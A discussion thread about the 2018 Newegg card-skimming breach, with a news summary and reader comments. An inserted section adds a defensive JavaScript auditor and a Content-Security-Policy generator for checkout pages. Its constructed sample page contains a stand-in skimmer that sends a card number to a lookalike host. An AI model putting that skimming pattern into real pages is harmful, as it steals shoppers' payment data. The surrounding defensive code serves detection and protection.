Hackers Stole Customer Credit Cards in Newegg Data Breach (techcrunch.com)
Newegg is clearing up its website after a month-long data breach. TechCrunch: Hackers injected 15 lines of card skimming code on the online retailer's payments page which remained for more than a month between August 14 and September 18, Yonathan Klijnsma, a threat researcher at RiskIQ, told TechCrunch. The code siphoned off credit card data from unsuspecting customers to a server controlled by the hackers with a similar domain name -- likely to avoid detection. The server even used an HTTPS certificate to blend in. The code also worked for both desktop and mobile customers -- though it's unclear if mobile customers are affected.
The online electronics retailer removed the code on Tuesday after it was contacted by incident response firm Volexity, which first discovered the card skimming malware and reported its findings. Newegg is one of the largest retailers in the US, making $2.65 billion in revenue in 2016. The company touts more than 45 million monthly unique visitors, but it's not known precisely how many customers completed transactions during the period.
lol
The last step of checkout has been glitchy for over a year. Though I have been using a card on file and only had to enter my CVV code multiple times, or gave up and used PayPal.
It had one job to do.
I should use this sig to advertise my book ISBN-13 : 978-1501515132.
Hosted payment services that redirect you to another domain, e.g. PayPal are much more resistant to scraping. This is obviously a problem that can not be left to individual sites to handle.
...one gold egg. Seriously, it was there for A MONTH and nobody noticed? Might be time to switch to a different site for my computer parts.
Good thing newegg doesn't have anything worth buying or this could have been a serious problem.
I always pay with Bitcoin when buying from Newegg, so I'm not affected by these skimming attacks.
The usual advice is to not let the merchant store your credit card credentials — so they would not be stolen when the company's DB is.
This time, however, the people keeping their cards "on file" with Newegg were safe, whereas those, who entered the credentials anew, weren't...
In Soviet Washington the swamp drains you.
So the bad guys got a 3rd party certificate? Last time I got one (Codomo I think) for my mail server they actually verified my identity by phone in order to actually issue the certificate for me.
Is that not routine now? How could the bad guys not be traced if they went so far as to buy a cert?
bad company, expected outcome.
I had to charge-back them for an item they clearly messed up on and stopped responding to questions. I've never had to do a charge-back before or since from anyone. frequent repeat-customer of 15-years, never had to return anything to these guys before.
I sleep better knowing that HTTPS has made us all safe from teh hax0rs.
Strange things are afoot at the Circle-K.
"Paying electronically is safer, Rick, you shouldn't use cash for anything, you'll just get mugged!", they said. "It's all secured with encryption, nothing to worry about!", they said
What's next, you going to tell me the Equifax breach was 'fake news' and never happened?
"Oh, well, I don't buy things from Newegg so I feel perfectly safe!", they say to you
Seriously, folks, when is enough going to be enough for you all? It's objectively clear that electronic payment systems, regardless of whose they are, are not anything even close to secure. Leave the plastic at home (or at least leave it in your wallet), pay cash for things in person, and look for some way to at least limit your exposure to the overwhelming risk of paying electronically for anything, anywhere, ever. Do it starting TODAY. Plan on doing it for a long time to come, because these mentally challenged primates who run these systems apparently can't keep all the holes plugged.
The real breach is in that the attackers were somehow able to change the web page content to achieve this end. Do they know how the attackers accomplished this? If not, what's to stop it from reoccurring, even if not by the same people, when someone else figures it out?
File under 'M' for 'Manic ranting'
Newegg used to be great. I'm not sure what happened but its crap now. Overrun by poor vendors that are allowed to falsely advertise. This CC issue is just the latest reason not to use Newegg.
This is why I always either use something like PayPal, Google Pay, Visa Check or similar when given the option, and when not given such an option I use Privacy virtual cards. Privacy gives you virtual debit card numbers so that you can use unique numbers for each retailer, and even allows for single use "burner" cards that close after one use. This, plus the ability to add spending limits on each card will either prevent or greatly reduce the possibility of any funds being taken by a hacker who skims the number. I use a different card for every site, and then burner cards for anything which I trust less. So far I've already blocked one unauthorized charge by setting a strict spending limit on one card (although this was from a shitty extra charge caused by the retailer rather than a hack, but it proves the feature works).
Shameless referral links:
https://cashback.privacy.com/sJS2wEHpZ
https://privacy.com/join/JWVHW
They aren't the same site they were a decade ago, loaded with 3rd party sellers peddling their dubious crap. If you are going to shop at newegg, you might as well just use eBay.
Retail sites need to stop this 3rd party seller crap, we already have eBay for that. It does nothing but give the retailers like newegg, amazon, walmart a bad rap. Sooner or later they'll finally learn this.
Here are the links to the original RiskIQ and Volexity reports on the breach.
RiskIQ: https://www.riskiq.com/blog/la...
Volexity: https://www.volexity.com/blog/...
Their conclusion is basically to get a new credit card number if you transacted with Newegg from 13 Aug through 18 Sep 2018.
Having just bought some things, I'm concerned, of course. Not to mention, newegg isn't remotely as good as they once were. Hell, I bought something on eBay and he shipped it two days faster and will get to me a week earlier than a similar order from newegg.
What are some good alternatives, outside of eBay and Amazon?
I have a hard time using the New Egg gift cards -- maybe the hackers can improve the checkout page so they work correctly?
Because they're hackers, you see. They can be anyone and do anything, they're the bogeyman of cyberspace. So any claim of "getting hacked" automatically means there was nothing you could have done to prevent it. This is why press releases or even news stories claiming "hackers!" are popular... and also not worth the read.
Anyway, one dead simple way to prevent javascript injection would be to disable javascript in the browser. Notice how *cough* certain browsers *cough* make that very hard, very impracticable, or even just plain impossible. But not all do. Of course, that requires that such sites also function without javascript enabled, and most make that impracticable or even just plain impossible, for essentially no reason.
Of course, that's not a complete fix: If the attackers managed to change what the original website served up they could change that to MITM the form submission, but at least there you could detect that suddenly every form from every customer gets sent from the MITM location, and hey what's up with that. Disabling javascript still cuts down on attack surface, since without javascript it's now harder to dynamically cross-load attack code from just any location, and so on. But anyway.
So the problem is the widespread rot that makes such fertile grounds for attackers. Same with, oh, that desktop emulating software package of crap that likes to drop its pants, bend over, and shout "OH HEY I DROPPED THE SOAP AGAIN" at every opportunity. It's so common that a sane environment becomes almost impossible to envision for those who have never experienced anything but this insanity. Thus the blaming of the bogeyman. This says really bad things about the people involved, yes, well spotted dear reader.
What if I paid using masterpass?
Many years ago (1998ish maybe?) I found out about Newegg and ordered a couple of sticks of RAM from them. They shipped me double what I ordered, and charged me for it. It was a nightmare to get my money refunded even AFTER I shipped back two sticks on my dime. It was such a bad experience that I swore I would never order from them again.
Fast forward a few years and I decided to give them another chance, and wow had they changed! They were my gold-standard for internet shopping experience. Fast, often free, shipping, perfect amount of communication and tracking, best prices, feature-rich search options, and fantastic review system.
Needless to say, I haven't bought anything from them for a few years now. It was caused by ordering something that I didn't realize was shipping directly from China. I still go to their site to find items and sometimes read the reviews, but I can now shop around once I find the item I want. Their reviews are still better than Amazon's, but Newegg just isn't close to what it used to be.
My beliefs do not require that you agree with them.
And when was Newegg going to inform their customers about this? Strange that we had to find out about this from a 3rd party news source. Does this only impact Newegg US, or other countries where Newegg does business affected too?
Is it possible to have oh, let's say New Egg, encrypt each and every customers account separately or would that be difficult.
I stopped using NewEgg over 9mo ago. So at least I'm not affected.
As a Connecticut resident who got screwed over by NewEgg releasing false data to the State of Connecticut, when they were also NOT legally obligated to, I stopped using them. Ex our tax friendly state in its endless quest to absolutely ruin any resident of the state and tax them to death decided to pursue gathering Sales Tax / "Use Tax" data from NewEgg back around January 2018. They had done this to other sites and online merchants on their quest to collect money. They would petition the vendor with a legally scary letter, telling them to hand over all purchase history for the last 5 years for every Connecticut resident over to the Connecticut Department of Revenue Services, our tax office essentially. Most told them to go pound sand as there was no legal authority for them to do this or request this information from the online vendors and CT couldn't do anything about it.
NewEgg. NewEgg, they just handed the data over. The state then had my ENTIRE purchase history. They did this WITHOUT any consumer notification. It was only AFTER the CT DRS processed the data and sent out Use Tax bills to NewEgg customers did they fess up on releasing the data. This wouldn't be a problem, as technically the Use Tax is owed, however the way they collected the data was flat out illegal. Both from a consumer protection and legal point of view. The bigger issue though THEY ABSOLUTELY messed up the data dumps. For example, 2014 I had made several thousand dollars of purchases. ONE was made on my account, with a friend's credit card. He got a bill from the CT DRS for my entire 2014 purchase history. Then the data I got for 2016 owed taxes included items that I had used out of state friends' credit cards for, and had shipped to them. No use tax was owed. Yet I had the bill. The CT DRS being the CT DRS left you no legal way to challenge this. You could call the number, and talk to someone (which me and several friends tried) who essentially told you to just pay it over and over despite it being wrong and incorrect data. In the end I paid it because it was only a few hundred dollar discrepancy and the consequences and repercussions of having a Tax Bill paid late were too large and would have made a bigger hole to crawl out of given how uncooperative the state was. I still blame NewEgg for giving them data.
Anyway, anyone who still uses NewEgg should have already known how NewEgg cares not the slightest about their customers privacy or information. It's absolutely NO surprise to me this happened, and is only further proof to drop them and not order from them again.
prepaid card you put cash on and then its zero...toss into trash
Big companies and small companies alike are addicted to WEBSTATS. It's hard to find a page out there that doesn't have 14 bits of Javascript code dedicated to giving better, targeted advertising and "customer service experience", so people would hardly be suspicious of code that sends information to "neweggstats.com".
There are HSTS headers that can be put on HTTPS pages to make sure the browser doesn't fall for this sort of thing, but using them tells the browser not to talk to those precious stat servers... so the stat-addicts won't.
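An added example, not code from the article, from Newegg, or from any commenter: the summary describes a few lines of script on the payment page sending card data to a lookalike domain, and the comments above raise two practical points, watching where every checkout form actually gets submitted, and using response headers to constrain what the page may talk to. The header that does the latter is Content-Security-Policy (script-src, connect-src, img-src, form-action); HSTS only forces HTTPS and says nothing about destination hosts. The script below audits a checkout page's outbound destinations against an allow-list, flags hosts that merely resemble the shop's own, and emits the CSP that would make the browser enforce the same allow-list. The page HTML, the host names under the reserved .test TLD, and the lookalike domain are all constructed for illustration; the inline script stands in for injected code and is not the skimmer from the incident.

```javascript
// Audit where a checkout page can send data, and derive the CSP that would
// enforce the same allow-list in the browser. Added example; every host name,
// the sample page and the stand-in "injected" script below are constructed.

const PAGE_ORIGIN = 'https://secure.example-shop.test';
const ALLOWED_HOSTS = ['secure.example-shop.test', 'static.example-shop.test'];

// Constructed checkout page. The last <script> stands in for injected code: it
// beacons a field to a host that looks like the shop's own but is not on the list.
const SAMPLE_HTML = `
<html><body>
<form id="pay" action="/checkout/submit" method="post">
  <input name="cardnumber"><input name="cvv"><button>Pay</button>
</form>
<script src="https://static.example-shop.test/checkout.js"></script>
<script>
  var f = document.getElementById('pay');
  f.addEventListener('submit', function () {
    new Image().src = 'https://secure.example-shop-checkout.test/i?c=' +
      encodeURIComponent(f.cardnumber.value);
  });
</script>
</body></html>`;

const URL_RE = /https?:\/\/[^\s"'<>()]+/g;

// Hostnames of every absolute URL in <script> attributes and inline script bodies.
function extractScriptHosts(html) {
  const hosts = new Set();
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    for (const text of [m[1], m[2]]) {
      for (const u of text.match(URL_RE) || []) {
        try { hosts.add(new URL(u).hostname); } catch (_) { /* not a parseable URL */ }
      }
    }
  }
  return [...hosts];
}

// Hostnames every <form> posts to, resolving relative actions against the page origin.
// A sudden change here across all customers is the MITM signal mentioned above.
function extractFormActionHosts(html, origin) {
  const hosts = new Set();
  const formRe = /<form\b[^>]*\baction=["']([^"']*)["']/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) hosts.add(new URL(m[1], origin).hostname);
  return [...hosts];
}

// Brand label of each allowed host: the label just left of the TLD ("example-shop").
function brandLabels(allowed) {
  return new Set(allowed.map(h => h.split('.').slice(-2, -1)[0]));
}

// A lookalike is a host that is not allowed but embeds one of the brand labels.
function isLookalike(host, allowed) {
  if (allowed.includes(host)) return false;
  return [...brandLabels(allowed)].some(b => host.includes(b));
}

// Compare everything the page references against the allow-list.
function auditPage(html, origin, allowed) {
  const seen = new Set([...extractScriptHosts(html), ...extractFormActionHosts(html, origin)]);
  const unexpected = [...seen].filter(h => !allowed.includes(h)).sort();
  return { unexpected, lookalikes: unexpected.filter(h => isLookalike(h, allowed)) };
}

// CSP pinning the same allow-list: scripts only from listed hosts (no inline script,
// so the injected block would not run), and fetches, images and form posts only to
// the page's own origin, so even code loaded some other way has nowhere to send data.
function buildCsp(allowed) {
  return [
    "default-src 'self'",
    `script-src 'self' ${allowed.join(' ')}`,
    "connect-src 'self'",
    "img-src 'self'",
    "form-action 'self'",
    "frame-ancestors 'none'",
  ].join('; ');
}

const report = auditPage(SAMPLE_HTML, PAGE_ORIGIN, ALLOWED_HOSTS);
console.log('unexpected hosts:', report.unexpected);
console.log('lookalikes:', report.lookalikes);
console.log('Content-Security-Policy:', buildCsp(ALLOWED_HOSTS));
```

Run it with node; on the constructed page it reports secure.example-shop-checkout.test as both unexpected and a lookalike, while the form still posts to the shop's own origin. Running the audit on every deploy against the live payment page, and shipping the emitted header, covers both halves of the problem: a diff in the report catches the injection, and the CSP stops the browser from completing the exfiltration whether or not anyone is watching. The lookalike check is deliberately crude (substring on the brand label); a production version would add edit-distance and homoglyph checks.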
People bitch, but the truth is significant losses are happening as a result of this shitty payment solution.
Security is never a priority over sales. The rhetorical question is, "I wonder what their security budget is or staffing?" Answer: Probably next to nothing. Until C Levels face jail time for negligence ergo not doing anything this will continue. Note I didn't say a breach. No one can be completely secure, however, what I am talking about here is doing nothing or next to nothing. Then they should serve time.